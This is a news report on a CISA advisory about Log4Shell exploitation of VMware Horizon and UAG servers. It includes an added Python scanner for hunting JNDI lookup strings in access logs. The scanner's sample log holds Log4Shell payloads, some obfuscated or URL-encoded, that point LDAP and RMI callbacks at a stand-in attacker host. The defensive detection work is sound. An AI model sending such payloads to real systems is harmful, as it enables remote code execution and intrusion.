Malicious actors continue to dog VMware Horizon and Unified Access Gateway server deployments, capitalizing on unpatched Log4Shell, the Cybersecurity and Infrastructure Security Agency said Thursday in a joint advisory with the U.S. Coast Guard Cyber Command.
The agencies are calling for organizations to update all VMware Horizon and UAG systems and, if fixes weren't applied in December 2021, to assume their systems are compromised and begin threat hunting.
The renewed warnings echo fears CISA shared in January. While initial threat activity tied to Log4j was limited, officials worried attackers would lie in wait.
The agencies have observed multiple state-sponsored threat groups exploiting Log4Shell, using the vulnerability to gain access and deploy loader malware to enable remote command and control, CISA said.
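One concrete starting point for the threat hunting the advisory calls for is to sweep HTTP access logs from Horizon and UAG hosts for the Log4Shell JNDI lookup strings attackers send to gain initial access. The scanner below is an added example, not code from the advisory, CISA or Cybersecurity Dive. It handles the two evasions that defeat a naive grep for "${jndi:": nested lookups such as ${${lower:j}ndi:...} and ${::-j} that are only resolved at log time, and URL-encoded payloads. The log lines, the host "attacker.example" and the request paths are constructed for illustration and are not indicators of compromise.

```python
"""Hunt for Log4Shell (CVE-2021-44228) JNDI lookup strings in web/access logs.

Added example, not part of the CISA advisory or the article. The sample log
lines below are constructed; attacker.example and the paths are not IOCs.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one whose body contains no further braces.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup after de-obfuscation; the scheme is optional so "${jndi:" alone still hits.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds)?", re.IGNORECASE)


def _resolve(m: "re.Match[str]") -> str:
    """Resolve one obfuscation lookup (default value, lower, upper) to the text it yields."""
    body = m.group(1)
    if ":-" in body:                        # ${anything:-x} -> x   e.g. ${::-j}, ${env:NOPE:-j}
        return body.split(":-", 1)[1]
    kind, sep, rest = body.partition(":")
    if sep and kind.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if sep and kind.lower() == "upper":     # ${upper:j} -> J
        return rest.upper()
    return m.group(0)                       # not an obfuscation (e.g. the jndi lookup itself): keep


def normalize(line: str, max_rounds: int = 20) -> str:
    """URL-decode, then peel nested lookups from the inside out until nothing changes."""
    line = unquote(unquote(line))           # double decode catches %2524 -> %24 -> $
    for _ in range(max_rounds):             # bounded so a pathological line cannot spin forever
        resolved = _LOOKUP.sub(_resolve, line)
        if resolved == line:
            break
        line = resolved
    return line


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once obfuscation is stripped."""
    return _JNDI.search(normalize(line)) is not None


def hunt(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_log4shell_probe(l)]


# Constructed sample access log: one clean request, three probes (plain, nested, URL-encoded),
# and a benign line that merely mentions log4j, to show the scanner does not key on the word.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Jun/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [20/Jun/2022:10:01:04 +0000] "GET /portal/?x=${${lower:j}${::-n}di:${lower:l}dap://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '10.0.0.9 - - [20/Jun/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D"',
    '10.0.0.7 - - [20/Jun/2022:10:01:06 +0000] "GET /docs/log4j-faq.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, normalized in hunt(SAMPLE_LOG):
        print(f"line {n}: {normalized}")
```

A hit here is evidence of an exploitation attempt, not proof of success; the follow-up is to check whether the Horizon or UAG host resolved or connected to the callback host named in the lookup, and then to pivot to the loader and command-and-control behaviour the advisory describes. Run it over UAG and Horizon Connection Server access logs, and over any reverse proxy in front of them, since the lookup string can arrive in any header or parameter that ends up logged.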
In one case, CISA found multiple threat actors compromising an unnamed organization and observed them moving laterally throughout the production environment. They compromised servers dedicated to security management, certificates and mail relay, along with a database holding sensitive law enforcement data, and also gained access to a disaster recovery network.
From there, the threat actors obtained credentials, including administrator accounts, which they used to run loader malware. This maneuver gave them the ability to "remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payload," CISA said.
In a three-week period, the attackers exfiltrated more than 130 gigabytes of data from the security management server to a foreign IP address, CISA said.
VMware did not respond to Cybersecurity Dive's questions by publication time.